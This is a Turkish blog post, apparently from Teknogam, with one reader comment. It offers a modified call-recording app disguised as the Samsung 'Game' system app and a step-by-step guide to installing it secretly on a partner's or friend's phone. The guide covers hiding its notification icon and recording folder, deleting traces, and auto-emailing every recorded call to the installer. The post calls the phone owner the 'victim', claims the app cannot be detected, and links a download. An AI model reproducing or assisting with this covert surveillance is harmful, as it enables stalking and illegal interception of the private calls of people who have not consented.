Android Telefon Dinleme Uygulaması (Yakınlarınızın Telefonunu Uzaktan Dinleyin)

Android Telefon Dinleme Uygulaması (Yakınlarınızın Telefonunu Uzaktan Dinleyin)


Merhaba Teknogam okurları , tamamen kendi ihtiyacıma yönelik yapmış olduğum bi yöntemin tıkır tıkır çalıştığını görünce sitemde olmazsa olmaz dedim ve siz değerli üyelerime paylaşmak istedim.

Öncelikle belirteyim ki bu yöntem, telefonunu elinize alıp kurcalayabileceğiniz arkadaş, eş dost vs. için geçerlidir. (Ne derece etik olduğu size kalmış) Yani cihaza elle uygulama yüklememiz gerekmektedir.

Bilindiği üzere birçok görüşme kayıt uygulaması bildirim gösteriyor, uyarı veriyor, onay istiyor vs.vs telefon sahibi kör cahil bile olsa anlıyor ses kayıt uygulaması yüklediğinizi. Bunu düşünerek, herkesin bildiği ve kullandığı ACR Recorder uygulamasını gözüme kestirdim ve editledim.Yapılan işlemler:
  • Uygulama İsmi Samsung Game Olarak değiştirildi (Gerek duyulmayan bi sistem uygulaması gibi gösterebilmek adına)
  • Uygulama iconu Samsung Game iconu ile değiştirildi (Resimde gördüğünüz üzere)
  • ACR nin PRO sürümü üzerinden edit yapıldı (ki otomatik mail için pro sürüm şarttı zaten)
  • Pro sürümde bile arama esnasında bildirim çubuğunda telefon iconu görünür. İconu siyah nokta ile değiştirerek tamamen gizlenmesi sağlandı.
Yapılan işlemlerden sonra programın kullanım mantığından kısaca bahsetmek istiyorum.
Uygulamamızı normal bi şekilde yüklüyoruz, aktif bildirimleri kapatıyoruz, birkaç ince ayardan sonra otomatik mail kısmına gelip, belirleyeceğimiz bi mail adresinden, belirleyeceğimiz başka bir mail adresine görüşmelerin anlık gönderilmesini sağlayacağız.

Yani uygulama bildiğimiz ACR arama kayıt uygulaması, fakat biz iconunu ve adını değiştirerek ve arayüzünden otomatik mail ayarı yaparak ve de uygulamayı menünün ücra bi köşesine atıp, üstüne bi de şifre koyarak kurbanın görüşmelerini mail adresimizden sınırsız dinleyebiliyoruz.
Yakalanma, tespit edilme ihtimaliniz sıfır '0'
Arayüze giriş için belirleyeceğiniz şifrenin tespit edilmeyecek zorlukta olması gerekiyor. Uygulamadan şüphelenen bile olsa, en fazla kaldırır yine de göremez kimin neler yaptığını, hangi maile bildirim gittiğini...

Resimli anlatıma geçmek istiyorum.
Eksiksiz çalışması ve iz bırakmaması için adımları harfi harfine uygulayın.

Uygulamayı hedef telefona yükleyelim, uyarıların tamamını kabul edelim:
Ayarlar kısmından, ilk önce genel ayarlara girip, pin kodunu aktif edelim ve kod belirleyelim. 

Ardından aynı sayfadaki tüm ayarları resimdeki gibi ayarlayalım:

Kayıt ayarları kısmından; kayıt klasörünü direk ana kısımda görülmeyecek bi klasör olarak belirleyelim. Kullanıcı, dosya yöneticisine girdiğinde ACR RECORDER diye bi klasör görmemesi lazım. Bu yüzden mümkün olduğunca derinlere ayarlayın. Ben whatsapp/Plus/restorePref klasörünü hedef gösterdim. Siz istediğiniz yeri gösterin. Yeter ki ana klasörde olmasın.
Ardından Bulut Servisi kısmına girelim.
Otomatik E posta seçeneklerinden alttakini seçmemiz gerekiyor iz bırakmamak açısından.
Seçeneği aktifleştirip, alt kısımda bulunan e postayı gönderecek olan maili ve şifresini yazın. (Boş/yeni bi mail alıp yazabilirsiniz.)
Hemen altta ise kayıtların hangi adrese gelmesini istiyorsak onu yazıyoruz:
Ayarları yaptıktan sonra uygulamadan çıkıyoruz.
Uygulamanın açılış şifre ekranı alttaki gibidir. Kullanıcı bu tarz işlerden pek anlamıyorsa / hatta anlasa bile şüpheleneceğini zannetmiyorum, sıkıntı olmayacaktır.
Şifre ekranımız:Ve uygulamamızın menüdeki uygulamalar arasındaki görüntüsü:Yapılacak son işlem:
Dosya yöneticisine girip, uygulamanın ilk kurulumunda otomatik oluşturduğu AcrCallsadlı klasörü siliyoruz.


İşlemler tamamdır. Uygulama simgesini de menüde orta kısımlara ya da klasör varsa klasör içine atarsanız dikkat çekmeyecektir.

E-Postanızı açın ve beklemede kalın 

İşlemleri eksiksiz yaptığınız taktirde kesinlikle çalışacaktır. Denendi ve kesinlikle alıntı yapılmadan anlatıldı.İndirme Linki


Not:
Uygulama, ilk başta şahsi ihtiyaç için editlendiğinden, sadece samsung cihazlarda bulunan Samsung Game adıyla editlendi.

Diğer cihazlarda da dikkat çekmeden çalışabilmesi açısından, tüm anroid cihazlarda bulunan ve kullanıcının pek tıklamadığı/dikkatini çekmeyen bi uygulamaadına editlenecek.

Örnek uygulama Önerilerinizi beliyorum.
Öneri  doğrultusunda yeniden edit yapılacak...

3 yorum

yorum
Ömer Ak
admin
23 Ocak 2016 12:52 ×

Hepsini yaptim kayitlara nerden bakacaz

Cevapla
avatar